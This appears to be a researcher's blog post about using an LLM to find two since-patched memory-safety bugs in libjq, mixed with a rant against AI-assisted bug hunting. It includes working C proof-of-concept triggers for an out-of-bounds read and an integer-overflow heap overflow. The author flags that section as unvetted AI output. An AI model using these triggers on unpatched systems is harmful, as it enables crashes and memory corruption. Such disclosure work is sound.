Using LLM GPT 5.4 to Find a 0-day in Libjq and then Cry!

Introduction & Disclaimer:

Everything found in this post is found by AI - I don't have access to other LLM's like the "Mythos" or other commercial tools from various security companies in this market. This is purely based on common man availability LLM tools. I would be an idiot if i say that LLM's not just from misanthropic can find bugs in source code and that too with lighting speeds.

I personally think this encourages "script kiddie" behaviour and is too good to be true to save humanity from oblivion, and additionally it enhances "cognitive offloading" turned to 20000 km high above, which is disastrous in the longer run, maybe not for experienced researcher but for people starting out or for people from other fields or medium level knowledge personal in a specific area of understanding can now just use this point-tool to get off on this fake high that they were never worthy of in the first place.

As humans find the path of least resistance and usage of LLM to do tasks that once pushed their cognitive limits are now being replaced with cheap prompts and noob syndicated language like " bruhh, find meh sum 0 dayz yaahh" - wtf the fucking fuck is this? Instead of, hmm let me read up little bit on how the parser for this certificate works, or how do i reach this function with what inputs?
"The thrill of pwning a system" - is what i live for!! (In this case, i missed it completely, cos no sport and i absolutely hate it) - But it seems this will probably be the future of finding bugs in source code at least to some extent but it will NEVER, let me repeat it will "NEVER" be able to get even close to what a human brain is capable of for the foreseeable future !

Why?

Shrouded amongst mystery and extremely large claim that "Anthropic's Mythos can find 0-days for breakfast" is good and bad.
I wanted to see for myself if other LLM's can do the same job and write a full-blown 0-day poc because firefox said "the zero days are numbered".

With some professional experience of finding 0-days in source code and mostly in weird binary constructs, i decided to give it a try. But LLM's seem to take the fun out of everything for me. No Fun No Game!

Background:

One fine day on an afternoon, after continuously being bombarded with AI posts, AI write-ups and the whole AI finding 0-day hype, i decided to test drive the default LLM agent that comes with vscode the chatGPT 5.4 model.
I went to github.com and checked out some open source libraries written in C/C++ and the first one that day that was trending probably was the "libjq" - the jq processing library that in simple terms makes your JSON crap looks a little better.
I wasn't much interested in the "jq" cli but rather the "libjq" that people may have linked in their LLM generated or superiorly written codebases.

One shotting ?

So, I cloned the then latest version which was
Just like everyone else on the internet i took the persona of the skiddie and said "bruh chatGPT" - Find me a security issue in this entire codebase for vulnerable patterns seen for buffer overflow, use after free, double free, integer overflow, null pointer dereferences, underflows, pointer manipulations, off-by-one and all kinds of other categories of implementation or logical failure - Skip the cli utility and only look at code that must be used or linked into an existing code bases, aka library code or code that exposes itself as API or via other interfaces"
Churning.... Churning.. Churning....
It generated ton of shit as any LLM does and i had to take some time to understand what was real, but hey you can just say " find me some real bugs mf and ignore the junk/crap"
Churning... churning... Churning....
Some hits that may work ...

The thing is:

When i cloned the repo, it was 9th of April 2026.

And the LLM found the two bugs on the same day within 4 hours.
Unfortunately, I just forgot about them and carried on with other things, then one day i realized i should probably update the source tree and try again, this was around 17th of April and by this time, i saw that both the bugs the exact same bugs were patched. I cried!!

This is not a story of how i using LL found bugs before someone did and that's not the point at all. It's a story of LLM's for source code analysis finding the same bug, which means a collision in pwn2own terms and thus a duplicate but completely valid as coming from 2 individual disconnected sources of information.
Credits to the authors of the CVE's who reported this vulnerability and got it fixed!

So here is a bug report. Some of it as you may have guessed is AI generated for reasons to justify doing this in the first place, but it misses the warmth that you need when reading something up

Bugs: (Below is LLM Generated content as LLM found it)

(I don't care if there are bugs in this section)

An out-of-bounds read in the jv_parse_sized() parse-error path.
An integer-overflow-driven heap overflow risk in invalid UTF-8 replacement logic.

Bug 1: `jv_parse_sized()` Error-reporting Out-of-Bounds Read

Vulnerable Version

Confirmed vulnerable tagged release:

jq-1.8.1

Verified vulnerable code in jq-1.8.1 tagged source:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
                                          jv_string_value(msg),
                                          string));

This is vulnerable because jv_parse_sized() accepts a (pointer, length) buffer, but the final error formatting step falls back to plain %s, which treats the input as a NUL-terminated C string.

Bug Details

The bug lives in the parse error path of jv_parse_sized_custom_flags() in src/jv_parse.c.

The sized parser setup is correct:

parser_init(&parser, flags);
jv_parser_set_buf(&parser, string, length, 0);
jv value = jv_parser_next(&parser);

The unsafe part happens later, after parsing fails and jq tries to attach the original input to the error message:

jv_string_fmt("%s (while parsing '%s')", jv_string_value(msg), string)

Because string is only valid for length bytes, %s can read past the caller-supplied boundary looking for a terminating \0.

Security consequence:

Out-of-bounds read in the error path
Possible crash if the read crosses into unmapped memory
Possible disclosure of adjacent readable bytes through the generated error string

PoC

#define _GNU_SOURCE

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#include "jv.h"

static void die(const char *what) {
  perror(what);
  exit(1);
}

int main(void) {
  long page_size_long = sysconf(_SC_PAGESIZE);
  if (page_size_long <= 0) {
    fprintf(stderr, "sysconf(_SC_PAGESIZE) failed\n");
    return 1;
  }

  size_t page_size = (size_t)page_size_long;

  char *mapping = mmap(NULL, page_size * 2, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (mapping == MAP_FAILED)
    die("mmap");

  if (mprotect(mapping + page_size, page_size, PROT_NONE) != 0)
    die("mprotect");

  memset(mapping, 'A', page_size);
  mapping[0] = '{';

  fprintf(stderr,
          "Calling jv_parse_sized() on a non-NUL-terminated malformed buffer.\n"
      "On a build with an out-of-bounds read in error formatting, this may\n"
      "SIGSEGV when the read crosses into the protected guard page.\n"
      "On the current fixed source build, it should return an error instead.\n");

  jv result = jv_parse_sized(mapping, (int)page_size);

  fprintf(stderr,
      "jv_parse_sized() returned instead of crashing. This is the expected\n"
      "result on the current source build in this workspace.\n");

  if (jv_invalid_has_msg(jv_copy(result))) {
    jv msg = jv_invalid_get_msg(result);
    fprintf(stderr, "Returned error: %s\n", jv_string_value(msg));
    jv_free(msg);
  } else {
    jv_free(result);
  }

  munmap(mapping, page_size * 2);
  return 0;
}

What the PoC does:

Allocates two pages with mmap()
Marks the second page PROT_NONE
Fills the first page with non-NUL bytes
Calls jv_parse_sized() on the first page

If jq formats the original input with %s, the read continues into the guard page and faults.

Vulnerable vs Patched

Vulnerable code:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
                                          jv_string_value(msg),
                                          string));

Patched code:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%.*s')",
                                          jv_string_value(msg),
                                          length,
                                          string));

Fix commit:

2f09060afab23fe9390cce7cb860b10416e1bf5f

Patch hunk:

-    value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
+    value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%.*s')",
                                               jv_string_value(msg),
+                                              length,
                                               string));

Bug 2: Invalid UTF-8 Replacement Integer Overflow

Vulnerable Version

Confirmed vulnerable tagged release:

jq-1.8.1

Verified vulnerable code in jq-1.8.1 tagged source:

uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD

This is vulnerable because the worst-case output size for invalid UTF-8 replacement is computed in 32-bit arithmetic. For sufficiently large length, length * 3 + 1 can wrap to a smaller value.

Bug Details

The bug lives in jvp_string_copy_replace_bad() in src/jv.c.

That function is reached when jq receives sized string input with invalid UTF-8 and replaces invalid bytes with U+FFFD.

Affected call path:

jv jv_string_sized(const char* str, int len) {
  return
    jvp_utf8_is_valid(str, str+len) ?
    jvp_string_new(str, len) :
    jvp_string_copy_replace_bad(str, len);
}

The vulnerable size calculation was:

uint32_t maxlength = length * 3 + 1;

If this wraps low, jq allocates too small a buffer and then writes replacement output based on the full logical expansion.

Security consequence:

Integer overflow in output size calculation
Undersized heap allocation
Heap buffer overflow during replacement writes

PoC

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#include "jv.h"

#define WRAP_TRIGGER_LEN 1431655766

static void *map_bytes(size_t length) {
  void *ptr = mmap(NULL, length, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (ptr == MAP_FAILED) {
    fprintf(stderr, "mmap(%zu) failed: %s\n", length, strerror(errno));
    exit(1);
  }
  return ptr;
}

static void unmap_bytes(void *ptr, size_t length) {
  if (munmap(ptr, length) != 0) {
    fprintf(stderr, "munmap(%zu) failed: %s\n", length, strerror(errno));
    exit(1);
  }
}

static void trigger_string_api(void) {
  unsigned char *buf = map_bytes(WRAP_TRIGGER_LEN);
  memset(buf, 0x80, WRAP_TRIGGER_LEN);

  fprintf(stderr,
          "triggering jv_string_sized() with %d bytes of invalid UTF-8\n",
          WRAP_TRIGGER_LEN);

  jv value = jv_string_sized((const char *)buf, WRAP_TRIGGER_LEN);
  jv_free(value);
  unmap_bytes(buf, WRAP_TRIGGER_LEN);
}

static void trigger_parser_api(void) {
  size_t json_length = (size_t)WRAP_TRIGGER_LEN + 2;
  unsigned char *buf = map_bytes(json_length);

  buf[0] = '"';
  memset(buf + 1, 0x80, WRAP_TRIGGER_LEN);
  buf[json_length - 1] = '"';

  fprintf(stderr,
          "triggering jv_parse_sized() with a JSON string containing %d invalid UTF-8 bytes\n",
          WRAP_TRIGGER_LEN);

  jv value = jv_parse_sized((const char *)buf, (int)json_length);
  jv_free(value);
  unmap_bytes(buf, json_length);
}

int main(int argc, char **argv) {
  if (WRAP_TRIGGER_LEN <= 0 || WRAP_TRIGGER_LEN > INT_MAX - 2) {
    fprintf(stderr, "invalid trigger length\n");
    return 2;
  }

  if (argc > 1 && strcmp(argv[1], "--parse") == 0) {
    trigger_parser_api();
    return 0;
  }

  trigger_string_api();
  return 0;
}

What the PoC does:

Allocates a very large input buffer
Fills it with invalid UTF-8 bytes
Sends it through jv_string_sized() or jv_parse_sized()
Targets the length * 3 + 1 wraparound condition in the historical code

Vulnerable vs Patched

Vulnerable code:

uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD

Patched code:

uint64_t maxlength = (uint64_t)length * 3 + 1;
if (maxlength >= INT_MAX) {
  return jv_invalid_with_msg(jv_string("String too long"));
}

Fix commit:

e47e56d226519635768e6aab2f38f0ab037c09e5

Patch hunk:

-  uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD
+  // worst case: all bad bytes, each becomes a 3-byte U+FFFD
+  uint64_t maxlength = (uint64_t)length * 3 + 1;
+  if (maxlength >= INT_MAX) {
+    return jv_invalid_with_msg(jv_string("String too long"));
+  }

End of LLM Generated content ---------

Is the Thrill of Pwning a System Gone?

Someone like me doesn't do anything just cos everyone else is doing it - what i do is deeply rooted in how interested I am in the topic and do i feel a sense of achievement after racking my brains for months - The answer for me is simple "With LLM's to find bugs, even if they are 0-days is meaningless to me as it doesn't stimulate my brain the same way like that, when i do it myself to get that dopamine hit that lasts probably days for which reasons i got into this field and how my childhood was actually motivated.
I know my process is slower and using LLM's is much faster, but i would trade the brain rot it brings to me and leaves a bad taste in my mouth after blowing it for hours and rather stick to my way.

Conclusions

It doesn't matter which LLM vendor or software you are using, the latest one is thus capable of finding security issues in source code at-least. How good the findings are depending on the personnel using the LLM and not the LLM itself.
So, there is nothing special about "Mythos" or any other models for that matter.

LLM's probably are the future for source code level analysis and has uses in other various fields. I believe it's only good as an auto-complete tool that when prompted enough may or may not lead you to your outcome.
This run was just an example, and it doesn't make it any true that only LLM's can now find bugs, it is just probably just shortening the time.
But again, this is a direction for brain rot for reasons mentioned above.

LLM's are not a substitute that you can offload everything to it and forget the world exists or it becomes a better , trust me, it doesn't for several reasons ranging from "cognitive offloading, dissonance, forgetting things, not pushing your mental limits, offloading or skipping the learning process and just pure vibing" these things are detrimental to your brain power in the longer run - We humans never learned anything by skipping things and why should LLM's be any different when it can just single shot everything.
The amount of time you spend prompting the LLM can be better spent in learning or understanding things at a deeper level that brings determinism in your brain, and you can use that new information to plan and design things better.

I also feel usage of LLM's is over-hyped beyond recognition these days and it will continue to happen.
However, it is also true as we saw in this write up that various industries will continue to evolve pushing forward various agendas and marketing material but real-life is not similar to prompting where you get things quickly but rather a combination of things. If i were to encounter a "person" who is like an LLM, I would probably slap him out of existence. E.g. think about explaining the same thing to a customer care executive (real) about a refund issue of your flight ticket and he doesn't understand and keeps asking you the same information and keeps circling back to the same thing again and again in a different way, LLM prompting is like that - wouldn't it be much simpler to just talk to a human and get your things resolved in a biological way.

Question for you?

To whom you will send the T-800 to kill?

Using LLM GPT 5.4 to Find a 0-day in Libjq and then Cry!

Introduction & Disclaimer:

Why?

Background:

One shotting ?

The thing is:

Bugs: (Below is LLM Generated content as LLM found it)

Bug 1: `jv_parse_sized()` Error-reporting Out-of-Bounds Read

Vulnerable Version

Bug Details

PoC

Vulnerable vs Patched

Bug 2: Invalid UTF-8 Replacement Integer Overflow

Vulnerable Version

Bug Details

PoC

Vulnerable vs Patched

End of LLM Generated content ---------

Is the Thrill of Pwning a System Gone?

Conclusions

Question for you?

We are the Resistance!

Comments

More from this blog

Philips Hue Bridge Investigations: Part I

Part I: Triaging Blueborne From Stripped Binary

How do you know what "Risks" you are shipping with your product ?

Script Kiddies Intro to LLM

Command Palette

Introduction & Disclaimer:

Why?

Background:

One shotting ?

The thing is:

Bugs: (Below is LLM Generated content as LLM found it)

Bug 1: jv_parse_sized() Error-reporting Out-of-Bounds Read

Vulnerable Version

Bug Details

PoC

Vulnerable vs Patched

Bug 2: Invalid UTF-8 Replacement Integer Overflow

Vulnerable Version

Bug Details

PoC

Vulnerable vs Patched

End of LLM Generated content ---------

Is the Thrill of Pwning a System Gone?

Conclusions

Question for you?

We are the Resistance!

Comments

More from this blog

Bug 1: `jv_parse_sized()` Error-reporting Out-of-Bounds Read